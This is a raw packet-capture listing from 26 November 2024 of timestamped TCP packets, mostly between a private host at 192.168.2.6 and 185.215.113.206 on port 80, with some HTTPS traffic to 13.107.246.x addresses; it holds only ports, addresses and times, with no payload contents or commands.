Nov 26, 2024 00:25:47.039227962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.039280891 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.039344072 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.040267944 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.040337086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.040373087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.040582895 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.041481972 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.041538000 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.041573048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.041645050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.042661905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.042722940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.042747021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.042795897 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.043819904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.043925047 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.043977022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.045094013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.045109034 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.045160055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.046201944 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.046250105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.046272993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.046288967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.047467947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.047481060 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.047519922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.047539949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.048495054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.048568964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.048741102 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.048824072 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.049706936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.049755096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.049837112 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.049911022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.051058054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.051069975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.051110029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.052068949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.052130938 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.052208900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.052397966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.053266048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.053385019 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.053389072 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.053426981 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.054383993 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.054523945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.054553986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.054569006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.055546999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.055634022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.055661917 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.055701971 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.056739092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.056783915 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.056866884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.056907892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.057923079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.057980061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.058079004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.058126926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.059076071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.059145927 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.059179068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.059250116 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.060260057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.060313940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.060374022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.060424089 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.061492920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.061541080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.061569929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.061687946 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.062752008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.062797070 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.062799931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.062851906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.063781023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.063853025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.063905954 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.063951015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.064989090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.065037966 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.065069914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.065131903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.066155910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.066242933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.066267967 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.066306114 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.067337990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.067399979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.067421913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.067511082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.068499088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.068674088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.068717957 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.069684982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.069747925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.069822073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.069937944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.070820093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.070875883 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.070888996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.071190119 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.072007895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.072057009 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.072135925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.072186947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.073431969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.073445082 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.073491096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.073491096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.074366093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.074378014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.074429989 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.075627089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.075639009 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.075681925 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.075813055 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.076791048 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.076802015 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.076844931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.077913046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.077975035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.077975035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.078099012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.079049110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.079104900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.079121113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.079195023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.080204964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.080250978 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.080393076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.080436945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.081415892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.081466913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.081552029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.081638098 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.082556963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.082628012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.082659006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.082701921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.083777905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.083848000 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.083861113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.083916903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.084964991 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.085026026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.085028887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.085063934 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.086179018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.086239100 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.086266041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.086491108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.087357998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.087420940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.087884903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.087941885 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.088447094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.088500023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.088526011 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.088592052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.089664936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.089710951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.089721918 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.089761972 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.090882063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.090920925 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.090970993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.092150927 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.092161894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.092210054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.116333961 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.121288061 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.121309042 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.121360064 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.121377945 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.121604919 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.122245073 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.123420000 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.124825954 CET	49864	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.124840021 CET	443	49864	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.137939930 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.137964964 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.138017893 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.138036966 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.138350010 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.147164106 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.147185087 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.147650003 CET	49869	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.147655964 CET	443	49869	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.152698040 CET	49861	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:47.152720928 CET	443	49861	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:47.177922010 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.177944899 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.178440094 CET	49868	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.178446054 CET	443	49868	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.232954025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.232968092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.233043909 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.233720064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.233731031 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.233782053 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.234831095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.234843969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.234900951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.234915018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.235565901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.235630035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.235658884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.235819101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.237018108 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.237030029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.237071037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.238217115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.238229036 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.238287926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.239283085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.239294052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.239336967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.240293026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.240365982 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.240427971 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.240473986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.241467953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.241525888 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.241573095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.241620064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.242602110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.242650986 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.242773056 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.242815018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.243845940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.243896008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.243993998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.245085001 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.245096922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.245152950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.245182037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.246114969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.246238947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.246283054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.247307062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.247446060 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.247509003 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.248533964 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.248595953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.248646975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.249650002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.249759912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.249818087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.250817060 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.251235008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.251262903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.251355886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.252033949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.252044916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.252089024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.253166914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.253237009 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.253324986 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.253420115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.254388094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.254458904 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.254657984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.254806042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.255563021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.255610943 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.255630016 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.255644083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.256726027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.256772995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.256782055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.256820917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.257858038 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.257910013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.257937908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.258029938 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.259028912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.259085894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.259146929 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.259571075 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.260215998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.260277033 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.260380983 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.260437965 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.261434078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.261495113 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.261544943 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.262567043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.262619019 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.262646914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.262691021 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.263798952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.263858080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.263866901 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.263948917 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.264936924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.264946938 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.264986038 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.264998913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.266119003 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.266130924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.266180038 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.266195059 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.267307043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.267371893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.267404079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.267404079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.268520117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.268594980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.268620014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.268706083 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.269686937 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.269738913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.270246029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.270317078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.270757914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.270838022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.271011114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.271071911 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.272042990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.272108078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.272113085 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.272150993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.273137093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.273217916 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.273284912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.273420095 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.274286032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.274374962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.274442911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.274480104 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.275538921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.275576115 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.275614023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.275645018 CET	49795	80	192.168.2.6	185.215.113.206
